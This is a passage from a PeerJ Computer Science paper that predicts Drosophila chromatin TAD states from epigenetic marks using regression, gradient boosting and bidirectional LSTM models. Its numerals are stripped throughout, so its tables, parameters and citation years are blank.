; rao et al., ). in mammals, the boundaries of tads are defined by the binding of insulator protein ctcf (rao et al., ). however, drosophila ctcf homolog is not essential for the formation of tad boundaries (wang et al., ). contribution of ctcf to the boundaries was detected in neuronal cells, but not in embryonic cells of drosophila (chathoth & zabet, ). at the same time, up to eight different insulator proteins have been proposed to contribute to the formation of tads boundaries (ramírez et al., ). ulianov et al. ( ) demonstrated that active transcription plays a key role in the drosophila chromosome partitioning into tads. active chromatin marks are preferably found at tad borders, while repressive histone modifications are depleted within inter- tads. thus, histone modifications instead of insulator binding factors might be the main tad-forming factors in this organism. to determine factors responsible for the tad boundary formation in drosophila, ulianov et al. ( ) utilized machine learning techniques. for that, they formulated a classification task and used a logistic regression model. the model input was a set of chip-chip signals for a genomic region, and the output, a binary value indicating whether the region was located at the boundary or within a tad. similarly, ramírez et al. ( ) demonstrated the effectiveness of the lasso regression and gradient boosting for the same task. however, this approach has two substantial limitations. first, the prediction of tad state as a categorical output depends on the tad calling procedure. it requires setting a threshold for the tad boundary definition and it is insensitive to sub-threshold boundaries. alternatively, the tad status of a region may be derived from a hi-c map either by calculation of local characteristics of tads such as insulation score (crane et al., ), d-score (stadhouders et al., ), directionality index (dixon et al., ), or by dynamic programming methods, such as armatus (filippova et al., ). methods assessing local characteristics of tads result in assigning a continuous score to genomic bins along the chromosome. dynamic programming methods are typically not anchored to a local genomic region and consider hi-c maps of whole chromosomes. the calculation of transitional gamma has the advantages of both approaches (ulianov et al., ). it runs dynamic programming for whole-chromosome data for multiple parameters and assesses the score for each genomic region. the second limitation is that regression and gradient boosting in ulianov et al. ( ) and ramírez et al. ( ) account for the features of a given region of the genome, but rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. ignore the adjacent regions. such contextual information might be crucial for the tad status in drosophila. for a possible solution, one may look at instructive examples of other chromatin architecture problems, such as improvement of hi-c data resolution (gong et al., ; schwessinger et al., ; li & dai, ), inference of chromatin structure (cristescu et al., ; trieu, martinez-fundichely & khurana, ), prediction of genomic regions interactions (whalen, truty & pollard, ; zeng, wu & jiang, ; li, wong & jiang, ; fudenberg, kelley & pollard, ; singh et al., ; jing et al., ; gan, li & jiang, ; belokopytova et al., ), and, finally, tad boundaries prediction in mammalian cells (gan et al., ; martens et al., ). the machine learning approaches used in these works include generalized linear models (ibn-salem & andrade-navarro, ), random forest (bkhetan & plewczynski, ; gan et al., ), other ensemble models (whalen, truty & pollard, ), and neural networks: multi-layer perceptron (gan et al., ), dense neural networks (zeng, wu & jiang, ; farré et al., ; li, wong & jiang, ), convolutional neural networks (schreiber et al., ), generative adversarial networks (liu, lv & jiang, ), and recurrent neural networks (cristescu et al., ; singh et al., ; gan, li & jiang, ). among these methods, recurrent neural networks (rnns) provide a comprehensive architecture for analyzing sequential data (graves, jaitly & mohamed, ), due to the temporal modeling capabilities. a popular implementation of rnn long short-term memory (lstm) models (hochreiter & schmidhuber, ) creates informative statistics that provide solutions for complex long-time-lag tasks (graves, ). thus, the application of ltsm rnns to problems with sequential ordering of a target, such as dna bins characteristics, is a promising approach. moreover, this feature is particularly relevant for the tad boundary prediction in drosophila, where the histone modifications of extended genomic regions govern the formation of boundaries (ulianov et al., ). here, we analyze the epigenetic factors contributing to the tad status of the genomic regions of drosophila. as opposed to previous approaches, we incorporate information about the region context on two levels. first, we utilize the context-aware tad characteristic transitional gamma. second, we use the advanced method of recurrent neural network that preserves the information about features of adjacent regions. materials and methods data hi-c datasets for three cultured drosophila melanogaster cell lines were taken from ulianov et al. ( ). cell lines schneider- (s ) and kc from late embryos and dmbg -c (bg ) from the central nervous system of third-instar larvae were analysed. the drosophila genome (dm assembly) was binned at the -kb resolution resulting in sequential genomic regions of equal size. each bin was described by the start coordinate on the chromosome and by the signal from a set of chip-chip experiments. the chip-chip data were obtained from the modencode database (waterston et al., ) and processed as in ulianov et al. ( ). rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. as chromatin architecture is known to be correlated with epigenetic characteristics in drosophila (ulianov et al., ; hug et al., ; ramírez et al., ), we selected two sets of epigenetic marks, i.e., transcription factors (tf), and insulator protein binding sites, and histone modifications (hm), for further analysis. the first set included five features (chriz, ctcf, su(hw), h k me , h k ac), which had been reported as relevant for tad formation in previous studies (ulianov et al., ). the second set contained eighteen epigenetic marks in total, extending the first set with thirteen potentially relevant features chosen based on the literature (rna polymerase ii, beaf- , gaf, cp , h k me , h k me , h k me , h k me , h k me , h k me , h k me , h k me , h k ac). to normalize the input data, we subtracted the mean from each value and then scaled it to the unit variance using the preprocessing scale function of the sklearn python library (pedregosa et al., ). we standardized each feature independently; the mean and variance were calculated per each feature (chromatin mark) separately across all input objects (bins), see fig. s . for the full list of chromatin factors and their modencode ids, see table s . target value tads are calculated based on hi-c interactions matrix. as a result of tad calling algorithm, tads are represented as a segmentation of the genome into discrete regions. however, resulting segmentation typically depends on tad calling parameters. in particular, widely used tad segmentation software armatus (filippova et al., ) annotates tads for a user-defined scaling parameter gamma. gamma determines the average size and the number of tads produced by armatus on a given hi-c map. following ulianov et al. ( ), we avoided the problem of selection of a single set of parameters for tads annotation and calculated the local characteristic of tad formation of the genome, namely, transitional gamma. the calculation of transitional gamma includes the tad calling for a wide range of reasonable parameters gamma and selection of characteristic gamma for each genomic locus. this procedure is briefly described below. when parameter gamma is fixed, armatus annotates each genomic bin as a part of a tad, inter-tad, or tad boundary. the higher the gamma value is used in armatus, the smaller on average the tads sizes are. we perform the tad calling with armatus for a set of parameters and characterize each bin by transitional gamma at which this bin switches from being a part of a tad to being a part of an inter-tad or a tad boundary. we illustrate the tads annotation and calculation of transitional gamma in figs. a– c. whole-genome hi-c maps of drosophila cells were collected from ulianov et al. ( ) and processed using armatus with a gamma ranging from to with a step of . . we then calculated the transitional gamma for each bin. the resulting distribution of values can be found in fig. d. we note that the value is corresponding to the bins that form tad regions that we have never observed as being tad boundary or inter-tad. these bins might switch from tads with the further increase of gamma. however, they represent a minor fraction of the genome corresponding to strong inner-tad bins. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure (a–c) example of annotation of chromosome r region by transitional gamma. for a given hi-c matrix of schneider- cells (a), tad segmentations (b) are calculated by armatus for a set of gamma values (from to , a step of . ). each line in b represents a single tad. then gamma tran- sitional (c) is calculated for each genomic region as the minimal value of gamma where the region be- comes inter-tad or tad boundary. the blue line in c represents the transitional gamma value for each genomic bin. the plots (b) and (c) are limited by gamma for better visualization, although they are continued to the value of . asterisk (*) denotes the region with gamma transitional of . , the minimal value of gamma, where the corresponding region transitions from tad to inter-tad. (d) the histogram of the target value transitional gamma for schneider- cell line. note the peak at . full-size doi: . /peerjcs. /fig- problem statement to avoid ambiguity, we formally state our machine learning problem: • objects are genomic bins of -kb length that do not intersect, • input features are the measurements of chromatin factors’ binding, • target value is the transitional gamma, which characterizes the tad status of the region and, thus, the dna folding, • objective is to predict the value of transitional gamma and to identify which of the chromatin features are most significant in predicting the tad state. selection of loss function the target, transitional gamma, is a continuous variable ranging from to , which yields a regression problem (yan & su, ). the classical optimization function for the regression is mean square error (mse), instead of precision, recall or accuracy, as for binary variables. however, the distribution of the target in our problem is significantly unbalanced (see fig. d) because the target value of most of the objects is in the interval between and . thus, the contribution of the error on objects with a high true target value may be also high in the total score when using mse. we note that the biological nature of genomic bins with high transitional gamma is different from other bins. transitional gamma equal to means that the bin never transformed from being a part of a tad to an inter-tad or tad boundary. to solve this rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. contradiction, we have introduced a custom loss function called modified weighted mean square error (wmse). it might be reformulated as mse multiplied by the weight (penalty) of the error, depending on the true value of the target variable. wmse = n n∑ i= (ytruei−ypredi) α−ytruei α , where n is the number of data points, ytruei is the true value for data point number i, ypredi is the predicted value for data point number i. here, α is the maximum value of ytrue increased by to avoid multiplying the error by . the maximum value of the transitional gamma in our dataset is , thus in our case, α equals . with wmse as a loss function, the model is penalized less for errors on objects with high values of transitional gamma. machine learning models to explore the relationships between the d chromatin structure and epigenetic data, we built linear regression (lr) models, gradient boosting (gb) regressors, and recurrent neural networks (rnn). the lr models were additionally applied with either l or l regularization and with both penalties. for benchmarking we used a constant prediction set to the mean value of the training dataset. due to the dna linear connectivity, our input bins are sequentially ordered in the genome. neighboring dna regions frequently bear similar epigenetic marks and chromatin properties (kharchenko et al., ). thus, the target variable values are expected to be vastly correlated. to use this biological property, we applied rnn models. in addition, the information content of the double-stranded dna molecule is equivalent if reading in forward and reverse direction. in order to utilize the dna linearity together with equivalence of both directions on dna, we selected the bidirectional long short-term memory (bilstm) rnn architecture (schuster & paliwal, ). the model takes a set of epigenetic properties for bins as input and outputs the target value of the middle bin. the middle bin is an object from the input set with an index i, where i equals to the floor division of the input set length by . thus, the transitional gamma of the middle bin is being predicted using the features of the surrounding bins as well. the scheme of this model is presented in fig. . we exploited the following parameters of the bilstm rnn in our experiments. the sequence length of the rnn input objects is a set of consecutive dna bins with fixed length that was varied from to (window size). the numbers of lstm units that we tested for were , , , , , , , , . the weighted mean square error loss function was chosen and models were trained with a stochastic optimizer adam (kingma & ba, ). early stopping was used to automatically identify the optimal number of training epochs. the dataset was randomly split into three groups: train dataset %, test dataset %, and % data for validation. to explore the importance of each feature from the input space, we trained the rnns using only one of the epigenetic features as input. additionally, we built models in which columns from the feature matrix were one by one replaced with zeros, and all other features rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure scheme of the implemented bidirectional lstm recurrent neural networks with one out- put. the values of {x ,..,xt} are the dna bins with input window size t, {h ,..,ht} are the hidden states of the rnn model, yt/ represents the corresponding target value transitional gamma of the middle bin xt/ . note that each bin xi is characterized by a vector of chromatin marks chip-chip data. full-size doi: . /peerjcs. /fig- were used for training. further, we calculated the evaluation metrics and checked if they were significantly different from the results obtained while using the complete set of data. results chromatin marks are reliable predictors of the tad state first, we assessed whether the tad state could be predicted from the set of chromatin marks for a single cell line (schneider- in this section). the classical machine learning quality metrics on cross-validation averaged over ten rounds of training demonstrate strong quality of prediction compared to the constant prediction (see table ). high evaluation scores prove that the selected chromatin marks represent a set of reliable predictors for the tad state of drosophila genomic region. thus, the selected set of chromatin marks can be used for chromatin folding patterns prediction in drosophila. the quality metric adapted for our particular machine learning problem, wmse, demonstrates the same level of improvement of predictions for different models (see table ). therefore, we conclude that wmse can be used for downstream assessment of the quality of the predictions of our models. these results allow us to perform the parameter selection for linear regression (lr) and gradient boosting (gb) and select the optimal values based on the wmse metric. for lr, we selected alpha of . for both l and l regularizations. gradient boosting outperforms linear regression with different types of regularization on our task. thus, the tad state of the cell is likely to be more complicated than a linear combination of chromatin marks bound in the genomic locus. we used a wide range of variable parameters such as the number of estimators, learning rate, maximum depth of the individual regression estimators. the best results were observed while setting the rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table evaluation of classical machine learning scores for all models, based on -features and - features inputs. model type mse mse mae mae r train test train test constant prediction . . . . using features: lr + l . . . . . lr + l . . . . . lr + l + l . . . . . gb- . . . . . bilstm rnn . . . . . using features: lr + l . . . . . lr + l . . . . . lr + l + l . . . . . gb- . . . . . bilstm rnn . . . . . table weighted mse of all models, based on -features and -features inputs. features features train test train test constant prediction . . . . linear regression . . . . linear regression + l . . . . linear regression + l . . . . linear regression + l + l . . . . grad boosting estimators . . . . grad boosting estimators . . . . bilstm units & bins . . . . ‘n_estimators’: , ‘max_depth’: and n_estimators’: , ‘max_depth’: , both with ‘learning_rate’: . . the scores are presented in tables and . the context-aware prediction of tad state is the most reliable the alternative model that we studied was bilstm neural network, which provides explicit accounting for linearly ordered bins in the dna molecule. we have investigated the hyperparameters set for bilstm and assessed the wmse on various input window sizes and numbers of lstm units. as we demonstrate in fig. , the optimal sequence length is equal to the input window size and lstm units. this result has a potential biological interpretation as the typical size of tads in drosophila, being around kb at -kb resolution hi-c maps which equals to bins. the incorporation of sequential dependency improved the prediction significantly, as demonstrated by the best quality scores achieved by the bilstm (table ). the selected rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure selection of the bilstm parameters. weighted mse scores for the train and test datasets are presented. (a) results of rnn with units for different sizes of sequence length. the sequence size corresponds to the input window size of the rnn or number of bins used together as an input sequence for the neural network. (b) results of rnn with an input sequence of six bins for the different number of lstm units. the box highlights the best scores. the bilstm with six input bins and lstm units was used throughout this study if not specified otherwise. full-size doi: . /peerjcs. /fig- bilstm with the best hyperparameters set performed two times better than the constant prediction and outscored all trained lr and gb models, see tables and . we note that the proposed bilstm model does not take into account the target value of the neighboring regions, both while training and predicting. our model uses the input values (chromatin marks) solely for the whole window and target values for the central bin in the window for training and assessment of validation results. thus, we conclude that bilstm was able to capture and utilize the sequential relationship of the input objects in terms of the physical distance in the dna. reduced set of chromatin marks is sufficient for a reliable prediction of the tad state in drosophila next, we used an opportunity to analyse feature importance and select the set of factors most relevant for chromatin folding. for an initial analysis, we selected a subset of five chromatin marks that we considered important based on the literature (two histone marks and three potential insulator proteins, -features model). the -features model performed slightly worse than the initial -features model (see tables and ). the difference in quality scores is rather small, supporting the selection of these five features as biologically relevant for tad state prediction. we note that the small impact of shrinking of the number of predictors might indicate the high correlation between chromatin features. this is in line with the concept of chromatin states when several histone modifications and other chromatin factors are responsible for a single function of dna region, such as gene expression (filion et al., ; kharchenko et al., ). feature importance analysis reveals factors relevant for chromatin folding into tads in drosophila we have evaluated the weight coefficients of the linear regression because the large weights strongly influence the model prediction. chromatin marks prioritization of -features lr rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure weighted mse using one feature for each input bin in the bilstm rnn. the first mark (‘all’) corresponds to scores of nns using the first dataset of chromatin marks features together, the last mark (‘const’) represents wmse using constant prediction. note that the lower the wmse value the better the quality of prediction. full-size doi: . /peerjcs. /fig- model demonstrated that the most valuable feature was chriz, while the weights of su(hw) and ctcf were the smallest. as expected, chriz factor was the top in the prioritization of the -features lr model. however, the next important features were histone marks h k me and h k me , supporting the hypothesis of histone modifications as drivers of tad folding in drosophila. we used two approaches for the feature selection of rnn: use-one feature and drop-one feature. when each single chromatin mark was used as the only feature of each bin of the rnn input sequence for training, the best scores were obtained for chriz and h k me (figs. , and ), similarly to the lr models results. when we dropped out one of the five features, we got scores that are almost equal to the wmse using the full dataset together. this does not hold for experiment with excluded chriz, where wmse increases. these results align with the outcome of use-one approach and while applying lr models. similar results were obtained while using the broader dataset. the results of applying the same approach of omitting each feature one by one using the second dataset of features allowed the evaluation of the biological impact of the features. the corresponding wmse rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure weighted mse using four out of five chromatin marks features together as the bilstm rnn input. each colour corresponds to the feature that was excluded from the input. note that the model is af- fected the most when chriz factor is dropped from features. full-size doi: . /peerjcs. /fig- scores are presented in fig. as well as the result of training the model on all features together. the results of omitting each feature one by one while using the second dataset of features are almost identical as we expected. it could be explained by the fact that most of the features are strongly correlated. tad state prediction models are transferable between cell lines of drosophila in order to explore the transferability of the results between various drosophila cell lines, we have applied the full pipeline for schneider- and kc cells from late embryos and dmbg -c (bg ) cells from the central nervous system of third-instar larvae. across all cell lines, the bilstm model has gained the best evaluation scores (table ). on average, the smallest errors were produced on the test set of the bg cell line. notably, the selected top features are robust between cell lines. the results of the usage of each feature separately for each of the cell lines can be found in fig. s . chriz was identified as the most influencing feature for schneider- and bg while being in the top four features for kc . histone modifications h k me and h k me gain very high scores on each dataset. however, ctcf was found in the top of the influencing chromatin marks only on the kc , while insulator su(hw) constantly scores almost the worst wmse across all cell lines. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure weighted mse on the test dataset while using each chromatin mark either as a single feature (blue line) or excluding it from the bilstm rnn input (yellow line). full-size doi: . /peerjcs. /fig- table weighted mse on cross-validation of all methods for each cell line and while using them to- gether. lower wmse orresponds to better quality of prediction. method schneider- kc dmbg -c all constant prediction . ± . . ± . . ± . . ± . linear regression . ± . . ± . . ± . . ± . linear regression + l . ± . . ± . . ± . . ± . linear regression + l . ± . . ± . . ± . . ± . linear regression + l + l . ± . . ± . . ± . . ± . gradient boosting . ± . . ± . . ± . . ± . bilstm units & bins . ± . . ± . . ± . . ± . the all-cell-lines model improves prediction for most cell lines finally, we tested the improvement of the prediction models that can be achieved by merging the information about all cell lines. for that, we merged all three cell lines as the input dataset and used the all-cell-lines model for the prediction on each cell line. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. the gain of scores was the highest for schneider- and kc , while bg demonstrated a slight decline in the prediction quality. we also note that bilstm was less affected by the addition of cross-cell-line data among all models. in general, the quality of the prediction has mostly improved, suggesting the universality of the biological mechanisms of the tad formation between three cell lines (two embryonic and one neuronal) of drosophila. discussion here, we developed the hi-chip-ml framework for the prediction of chromatin folding patterns for a set of input epigenetic characteristics of the genome. using this framework, we provide the proof of concept that incorporation of information about the context of genomic regions is important for the tad status and spatial folding of genomic regions. our approach allows for diverse biological insights into the process of tad formation in drosophila, identified using the features importance analysis. firstly, we found that chromodomain protein chriz, or chromator (eggert, gortchakov & saumweber, ), might be an important player of the tad formation mechanism. recurrent neural networks that used only chriz as the input produced the highest scores among all rnns using single epigenetic marks (figs. , ). moreover, the removal of chriz strongly influenced the prediction scores when four out of five selected chip features were together (fig. ). all linear models assigned the highest regression weight to the chriz input signal. further, with the l regularization chriz was the only feature that the model selected for prediction. this chromodomain protein is known to be specific for the inter-bands of drosophila melanogaster chromosomes (chepelev et al., ), tad boundaries and the inter-tad regions (ulianov et al., ), while profiles of proteins that are typically over-represented in inter-bands (including chriz) correspond to tad boundaries in embryonic nuclei (zhimulev et al., ). the binding sites of insulator proteins chriz and beaf- are enriched at tad boundaries (hou et al., ; hug et al., ; ramírez et al., ; sexton et al., ). wang et al. ( ) reported the predictor of the boundaries based on the combination of beaf- and chriz. this might explain beaf- achieving the third rank of the predictability score. secondly, the application of the recurrent neural network using each of the selected chromatin marks features separately (fig. ) has revealed a strong predictive power of active histone modifications such as h k me . this result aligns with the fact that h k me defines the transcription factor binding regions in different cells, about % of transcription factor binding regions (tfbrs) on average overlap with h k me regions, and use h k me together with h k ac regions to improve the prediction of tfbrs (wang, li & hu, ). histone modifications h k me , h k ac, h k me , h k me , h k ac, and other active chromatin marks are also enriched in inter-tads and tad boundaries (ulianov et al., ). in addition, h k ac and h k me distinguish poised and active enhancers (barski et al., ; creyghton et al., ; rada-iglesias et al., ). thirdly, models using su(hw) and ctcf perform as expected given that, for the prediction of tad boundaries, the binding of insulator proteins su(hw) and ctcf have rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. performed worse than other chromatin marks (ulianov et al., ). in drosophila, the absence of strong enrichment of ctcf at tad boundaries and preferential location of su(hw) inside tads implies that ctcf- and su(hw)-dependent insulation is not a major determinant of tad boundaries. our results also demonstrate that the impact of su(hw) and ctcf is low for both proteins. thus, our framework not only accurately predicts positions of tads in the genome but also highlights epigenetic features relevant for the tad formation. importantly, the use of adjacent dna bins created a meaningful biological context and enabled the training of a comprehensive ml model, strongly improving the evaluation scores of the best rnn model. we note that there are few limitations to our approach. in particular, the resolution of our analysis is kb, while tad properties and tad-forming factors can be different at finer resolutions (wang et al., ; rowley et al., ; rowley et al., ). on the other hand, the use of coarse models allowed us to test the approach and select the best parameters while training the models multiple times efficiently. the training of the model for hi-c with the resolution up to bp presents a promising direction for future work, leading to the clarification of other factors’ roles in the formation of smaller tad boundaries that are beyond the resolution of our models. we also note that transitional gamma is just one of multiple measures of the tad state for a genomic region. we motivate the use of transitional gamma by the fact that it is a parameter-independent way of assessing tad prominence calculated for the entire map. this guarantees the incorporation of the information about the interactions of the whole chromosome at all genomic ranges, which is not the case for other approaches such as the insulation score (crane et al., ), d-score (stadhouders et al., ), and directionality index (dixon et al., ). on the other hand, the presented pipeline may be easily transferred to predict these scores as target values, which is an important direction for the extension of the work. here we selected features that had been reported to be associated with the chromatin structure. we note there might be other factors contributing to the tad formation that were not included in our analysis. the exploration of a broader set of cell types might be a promising direction for this research, as well as the integration of various biological features, such as raw dna sequence, to the presented models. we also anticipate promising outcomes of applying our approach to study the chromatin folding in various species except for drosophila. the code is open-source and can be easily adapted to various related tasks. conclusions to sum up, we developed an approach for analysis of a set of chromatin marks as predictors of the tad state for a genomic locus. we demonstrate a strong empirical performance of linear regression, gradient boosting, and recurrent neural network prediction models for several cell lines and a number of chromatin marks. the selected set of chromatin marks can reliably predict the chromatin folding patterns in drosophila. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recurrent neural networks incorporate the information about epigenetic surroundings. the highest prediction scores were obtained by the models with the biologically interpretable input size of kb that aligns with the average tad size for the kb binning in drosophila. thus, we propose that the explicit accounting for linearly ordered bins is important for chromatin structure prediction. the top-influencing tad-forming factors of drosophila are chriz and histone modification h k me . the chromatin factors that influence the prediction most are stable across the cell lines, which suggests the universality of the biological mechanisms of tad formation for two embryonic and one neuronal drosophila cell line. on the other hand, the training of models on all cell lines simultaneously generally improves the prediction. the implemented pipeline called hi-chip-ml is open-source. the methods can be used to explore the d chromatin structure of various species and may be adapted to any similar biological problem and dataset. the code is freely available at: https://github.com/michalrozenwald/hi-chip-ml. additional information and declarations funding this study was supported by the russian science foundation, grant number - - , and skoltech fellowship in systems biology for aleksandra a. galitsyna. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: russian science foundation: - - . skoltech fellowship in systems biology. competing interests mikhail gelfand is an academic editor for peerj. grigory v. sapunov is employed by intento, inc. author contributions • michal b. rozenwald conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • aleksandra a. galitsyna conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • grigory v. sapunov, ekaterina e. khrameeva and mikhail s. gelfand conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/michalrozenwald/hi-chip-ml http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: . the code and the data are available at github: https://github.com/michalrozenwald/ hi-chip-ml . the chromatin marks are available at modencode using the following ids: # name schneider- kc dmbg -c chriz ctcf su(hw) beaf- cp gaf h k me h k me h k me h k me h k me h k ac h k me h k me h k me h k me h k ac rna-polymerase-ii . the hi-c data is available at ncbi geo: gse . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references barski a, cuddapah s, cui k, roh t-y, schones de, wang z, wei g, chepelev i, zhao k. . high-resolution profiling of histone methylations in the human genome. cell ( ): – doi . /j.cell. . . . belokopytova ps, nuriddinov ma, mozheiko ea, fishman d, fishman v. . quantitative prediction of enhancer–promoter interactions. genome research ( ): – doi . /gr. . . bkhetan za, plewczynski d. . three-dimensional epigenome statistical model: genome-wide chromatin looping prediction. scientific reports : doi . /s - - - . chathoth kt, zabet nr. . chromatin architecture reorganization during neu- ronal cell differentiation in drosophila genome. genome research ( ): – doi . /gr. . . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/michalrozenwald/hi-chip-ml https://github.com/michalrozenwald/hi-chip-ml https://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=gse http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /gr. . http://dx.doi.org/ . /peerj-cs. chepelev i, wei g, wangsa d, tang q, zhao k. . characterization of genome- wide enhancer-promoter interactions reveals co-expression of interacting genes and modes of higher order chromatin organization. cell research ( ): – doi . /cr. . . crane e, bian q, mccord rp, lajoie br, wheeler bs, ralston ej, uzawa s, dekker j, meyer bj. . condensin-driven remodelling of x chromosome topology during dosage compensation. nature ( ): – doi . /nature . creyghton mp, cheng aw, welstead gg, kooistra t, carey bw, steine ej, hanna j, lodato ma, frampton gm, sharp pa, boyer la, young ra, jaenisch r. . hi- stone h k ac separates active from poised enhancers and predicts developmental state. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . cristescu b-c, borsos z, lygeros j, martínez mr, rapsomaniki ma. . inference of the three-dimensional chromatin structure and its temporal behavior. arxiv preprint. arxiv: . . dixon jr, selvaraj s, yue f, kim a, li y, shen y, hu m, liu js, ren b. . topological domains in mammalian genomes identified by analysis of chromatin interactions. nature ( ): – doi . /nature . eggert h, gortchakov a, saumweber h. . identification of the drosophila interband-specific protein z as a dna-binding zinc-finger protein deter- mining chromosomal structure. journal of cell science ( ): – doi . /jcs. . eraslan g, avsec Ž, gagneur j, theis fj. . deep learning: new computational modelling techniques for genomics. nature reviews genetics ( ): – . farré p, heurteau a, cuvier o, emberly e. . dense neural networks for predicting chromatin conformation. bmc bioinformatics ( ): – doi . /s - - -z. filion gj, van bemmel jg, braunschweig u, talhout w, kind j, ward ld, brugman w, de castro ij, kerkhoven rm, bussemaker hj, van steensel b. . systematic protein location mapping reveals five principal chromatin types in drosophila cells. cell ( ): – doi . /j.cell. . . . filippova d, patro r, duggal g, kingsford c. . identification of alternative topological domains in chromatin. algorithms for molecular biology ( ): doi . / - - - . fudenberg g, kelley dr, pollard ks. . predicting d genome folding from dna sequence. biorxiv doi . / . gan m, li w, jiang r. . encontact: predicting enhancer-enhancer contacts using sequence-based deep learning model. peerj ( ): – doi . /peerj. . gan w, luo j, li yz, guo jl, zhu m, li ml. . a computational method to predict topologically associating domain boundaries combining histone marks and sequence information. bmc genomics ( ): – doi . /s - - - . gong y, lazaris c, sakellaropoulos t, lozano a, kambadur p, ntziachristos p, aifantis i, tsirigos a. . stratification of tad boundaries reveals preferential insulation rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cr. . http://dx.doi.org/ . /nature http://dx.doi.org/ . /pnas. http://arxiv.org/abs/ . http://dx.doi.org/ . /nature http://dx.doi.org/ . /jcs. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. of super-enhancers by strong boundaries. nature communications ( ): doi . /s - - - . graves a. . supervised sequence labelling. in: supervised sequence labelling with recurrent neural networks. studies in computational intelligence, vol . berlin: springer, – doi . / - - - - _ . graves a, jaitly n, mohamed a-r. . hybrid speech recognition with deep bidi- rectional lstm. in: ieee workshop on automatic speech recognition and understanding. ieee, – . hochreiter s, schmidhuber j. . long short-term memory. neural computation ( ): – doi . /neco. . . . . hou c, li l, qin zs, corces vg. . gene density, transcription, and insulators con- tribute to the partition of the drosophila genome into physical domains. molecular cell ( ): – doi . /j.molcel. . . . hug cb, grimaldi ag, kruse k, vaquerizas jm. . chromatin architecture emerges during zygotic genome activation independent of transcription. cell ( ): – doi . /j.cell. . . . ibn-salem j, andrade-navarro ma. . c: computational chromosome conforma- tion capture by correlation of chip-seq at ctcf motifs. bmc genomics ( ): doi . /s - - - . jing f, zhang s, cao z, zhang s. . an integrative framework for combining se- quence and epigenomic data to predict transcription factor binding sites using deep learning. in: ieee/acm transactions on computational biology and bioinformatics. piscataway: ieee. johnson ds, mortazavi a, myers rm, wold b. . genome-wide mapping of in vivo protein-dna interactions. science ( ): – doi . /science. . kharchenko pv, alekseyenko aa, schwartz yb, minoda a, riddle nc, ernst j, sabo pj, larschan e, gorchakov aa, gu t, linder-basso d, plachetka a, shanower g, tolstorukov my, luquette lj, xi r, jung yl, park rw, bishop ep, canfield tk, sandstrom r, thurman re, macalpine dm, stamatoyannopoulos ja, kellis m, elgin scr, kuroda mi, pirrotta v, karpen gh, park pj. . compre- hensive analysis of the chromatin landscape in drosophila melanogaster. nature ( ): – doi . /nature . kingma dp, ba j. . adam: a method for stochastic optimization. arxiv preprint. arxiv: . . krijger phl, de laat w. . regulation of disease-associated gene expression in the d genome. nature reviews molecular cell biology ( ): – doi . /nrm. . . li z, dai z. . srhic: a deep learning model to enhance the resolution of hi-c data. frontiers in genetics : doi . /fgene. . . li w, wong wh, jiang r. . deeptact: predicting d chromatin contacts via boot- strapping deep learning. nucleic acids research ( ):e doi . /nar/gkz . rozenwald et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /neco. . . . http://dx.doi.org/ . /j.molcel. . . http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /science. http://dx.doi.org/ . /nature http://arxiv.org/abs/ . 